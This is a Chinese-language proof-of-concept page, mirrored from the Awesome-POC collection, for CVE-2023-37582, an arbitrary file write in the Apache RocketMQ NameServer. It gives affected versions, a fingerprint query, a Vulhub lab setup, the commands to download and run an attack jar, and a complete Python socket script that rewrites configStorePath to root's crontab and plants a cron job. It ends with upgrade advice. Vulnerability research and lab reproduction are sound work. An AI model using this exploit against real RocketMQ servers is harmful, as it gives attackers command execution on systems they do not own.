mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 12:25:11 +00:00
89 lines
3.2 KiB
Markdown
89 lines
3.2 KiB
Markdown
|
# Apache RocketMQ NameServer 任意文件写入漏洞 CVE-2023-37582
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
Apache RocketMQ 是一个分布式消息和流处理平台,具有低延迟、高性能和可靠性、万亿级容量和灵活的可扩展性。
|
|||
|
|
|
|||
|
|
在 RocketMQ 版本 5.1.1 及以下版本中,NameServer 组件存在一个任意文件写入漏洞。该漏洞存在于 RocketMQ 的 NameServer 组件的配置更新功能中。通过向 NameServer 发送 `UPDATE_NAMESRV_CONFIG` 命令,攻击者可以修改 `configStorePath` 配置项及其内容,从而导致任意文件写入。
|
|||
|
|
|
|||
|
|
该漏洞源于对 [CVE-2023-33246](https://github.com/vulhub/vulhub/tree/master/rocketmq/CVE-2023-33246) 的不完全修复。在处理 CVE-2023-33246 时,官方团队建立了一个不能被修改的配置项黑名单。然而,补丁错误地将黑名单指定为 `configStorePathName`,而应该是 `configStorePath`,导致了这一结果。
|
|||
|
|
|
|||
|
|
参考链接:
|
|||
|
|
|
|||
|
|
- https://github.com/apache/rocketmq/pull/6843
|
|||
|
|
- https://drun1baby.top/2023/11/21/CVE-2023-37582-Apache-RocketMQ-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
|
|||
|
|
- https://github.com/Malayke/CVE-2023-37582_EXPLOIT
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
RocketMQ < 4.9.7
|
|||
|
|
RocketMQ < 5.1.2
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title="RocketMQ"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 环境搭建
|
|||
|
|
|
|||
|
|
Vulhub 执行如下命令启动一个 RocketMQ NameServer 5.1.0:
|
|||
|
|
|
|||
|
|
```shell
|
|||
|
|
docker compose up -d
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
环境启动后,RocketMQ 的 NameServer 将会监听在 9876 端口。
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
使用这个 Vulhub 项目 [rocketmq-attack](https://github.com/vulhub/rocketmq-attack) 来复现漏洞并写入任意文件:
|
|||
|
|
|
|||
|
|
```shell
|
|||
|
|
wget https://github.com/vulhub/rocketmq-attack/releases/download/1.1/rocketmq-attack-1.1-SNAPSHOT.jar
|
|||
|
|
java -jar rocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv --target your-ip:9876 --file "/tmp/awesome_poc" --data "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
执行完成后,可以验证文件是否写入成功:
|
|||
|
|
|
|||
|
|
```shell
|
|||
|
|
cat /tmp/awesome_poc
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
定时任务:
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import socket
|
|||
|
|
import binascii
|
|||
|
|
client = socket.socket()
|
|||
|
|
# you ip port(9876)
|
|||
|
|
client.connect((target_ip,target_port))
|
|||
|
|
# data
|
|||
|
|
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":435}'.encode('utf-8')
|
|||
|
|
body='configStorePath=/var/spool/cron/crontabs/root\nbrokerConfigPath=/var/spool/cron/crontabs/root\nbindAddress=0.0.0.0\\n*/1 * * * * touch /tmp/success'.encode('utf-8')
|
|||
|
|
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
|
|||
|
|
head1 = '00000000'+str(hex(json_lens))[2:]
|
|||
|
|
print(head1)
|
|||
|
|
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
|
|||
|
|
head2 = '00000000'+str(hex(all_lens))[2:]
|
|||
|
|
print(head2)
|
|||
|
|
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
|
|||
|
|
# send
|
|||
|
|
client.send(bytes.fromhex(data))
|
|||
|
|
data_recv = client.recv(1024)
|
|||
|
|
print(data_recv)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞修复
|
|||
|
|
|
|||
|
|
目前官方已发布安全版本,建议受影响用户升级至:
|
|||
|
|
|
|||
|
|
- RocketMQ 5.x >= 5.1.2
|
|||
|
|
- RocketMQ 4.x >= 4.9.7
|
|||
|
|
|
|||
|
|
官方补丁下载地址: https://rocketmq.apache.org/download/ ,同时建议将 NameServer、Broker 等组件部署在内网,并增加权限认证。
|